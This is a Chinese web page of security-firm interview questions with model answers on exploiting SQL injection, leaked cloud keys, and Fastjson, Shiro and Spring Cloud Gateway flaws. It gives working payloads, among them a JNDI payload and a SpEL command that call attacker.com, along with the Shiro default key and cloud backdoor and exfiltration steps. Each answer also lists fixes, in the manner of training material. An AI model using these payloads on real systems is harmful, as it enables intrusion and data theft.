当前位置: 首页 > article >正文

绿盟面试题

《网安面试指南》https://mp.weixin.qq.com/s/RIVYDmxI9g_TgGrpbdDKtA?token=1860256701&lang=zh_CN

5000篇网安资料库https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486065&idx=2&sn=b30ade8200e842743339d428f414475e&chksm=c0e4732df793fa3bf39a6eab17cc0ed0fca5f0e4c979ce64bd112762def9ee7cf0112a7e76af&scene=21#wechat_redirect

1. SQL注入进阶利用

题目:某登录系统存在SQL注入漏洞,但过滤了'"空格union关键字,如何绕过并获取管理员密码?
答案

  • 绕过引号:使用十六进制编码(0x61646D696E代替'admin')或宽字节注入(%bf%27);
  • 绕过空格:用/**/%0a代替;
  • 绕过union:使用盲注(布尔/时间盲注)或报错注入(extractvalue(1,concat(0x7e,(select user()))));
  • 利用示例:admin'^extractvalue(1,concat(0x7e,(select substr(password,1,20) from users where username=0x61646D696E)))%23
    修复方案:预编译(PreparedStatement)+ 白名单过滤。

2. AK/SK泄露的云环境渗透

题目:在GitHub公开代码中发现某云厂商的AK/SK,如何快速验证并扩大攻击面?
答案

  1. 验证AK/SK有效性:使用AWS CLI执行aws sts get-caller-identity(或对应云厂商SDK);
  2. 权限枚举:列出IAM权限边界、S3存储桶、EC2实例等;
  3. 横向移动:创建后门用户、生成临时凭证、部署恶意Lambda函数;
  4. 数据泄露:下载敏感存储桶数据或数据库快照。
    修复方案:使用环境变量存储密钥、启用密钥轮换、限制IAM权限范围。

3. Fastjson反序列化漏洞

题目:如何利用Fastjson ≤1.2.24的反序列化漏洞实现RCE?给出利用链及限制条件。
答案

  • 利用链JdbcRowSetImpl + JNDI注入(需出网);
  • Payload
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://attacker.com/Exploit","autoCommit":true}
  • 限制条件:目标需开启autoType功能(默认关闭);
  • 修复方案:升级至1.2.83+,关闭autoType,使用安全模式。

4. Java代码审计:危险方法调用

题目:审计以下代码,指出漏洞并说明利用方式:

String cmd = request.getParameter("cmd");
Runtime.getRuntime().exec(cmd);

答案

  • 漏洞:未过滤直接执行用户输入的cmd参数,导致命令注入;
  • 绕过技巧:使用;&|$(subshell)分割命令;
  • 修复方案:使用白名单校验或ProcessBuilder参数化调用。

5. Shiro反序列化漏洞

题目:如何利用Shiro的RememberMe功能实现反序列化攻击?给出关键步骤。
答案

  1. 获取Cookie中的rememberMe字段(Base64+AES-CBC加密);
  2. 利用已知Key(默认Key如kPH+bIxk5D2deZiIxcaaaA==)或爆破Key;
  3. 构造恶意序列化数据(如CommonsCollections链),加密后替换Cookie;
  4. 触发反序列化实现RCE。
    修复方案:更换Shiro Key,升级至1.7.0+,禁用危险链。

6. 框架漏洞:Spring Cloud Gateway RCE

题目:简述CVE-2022-22947的利用条件及攻击步骤。
答案

  • 漏洞成因:未校验路由配置的Filter参数,导致SpEL表达式注入;
  • 利用步骤
    1. 添加恶意路由:POST /actuator/gateway/routes/test,Body包含SpEL表达式(如T(java.lang.Runtime).getRuntime().exec("curl attacker.com"));
    2. 刷新路由:POST /actuator/gateway/refresh
    3. 访问路由触发RCE。
      修复方案:升级Spring Cloud Gateway至3.1.1+,禁用Actuator接口。

7. SQL注入绕过WAF

题目:某WAF拦截了UNION SELECTinformation_schema,如何获取数据库名?
答案

  • 替代information_schema:使用sys.schema_auto_increment_columns(MySQL 5.6+);
  • 绕过UNION:利用报错注入或布尔盲注;
  • Payload示例:
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),0x7e,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --+

修复方案:使用ORM框架+参数化查询,禁用错误回显。


http://www.kler.cn/a/594626.html

相关文章:

  • ICRA 2025 面向移动抓取的全身控制新范式——让机器人在移动与操控之间动态平衡
  • C++实现rabbitmq生产者消费者
  • 我开发的PDF转WORD免费工具
  • 高性能边缘计算网关-高算力web组态PLC网关
  • yt-dlp工具下载视频使用方法
  • javaFX的使用
  • 市场上具备自动化营销功能的进销存软件推荐
  • Spring Boot 3 新特性实战:从理论到实践
  • vsftpd服务权限配置
  • 前后端项目
  • 模型空间、图纸空间、布局(Layout)之间联系——CAD c#二次开发
  • Node.js中SerialPort(串口)模块使用详解
  • debian11安装MongoDB
  • 美摄接入DeepSeek等大模型,用多模态融合重构视频创作新边界!
  • NLua 文档
  • 《模型思维》第二十三章 “与集体行动有关的问题” 总结
  • 华为NAS真实测评!
  • 基于Spring Boot的售楼管理系统的设计与实现(LW+源码+讲解)
  • Python(正则表达式)
  • JAVA多线程中的单例模式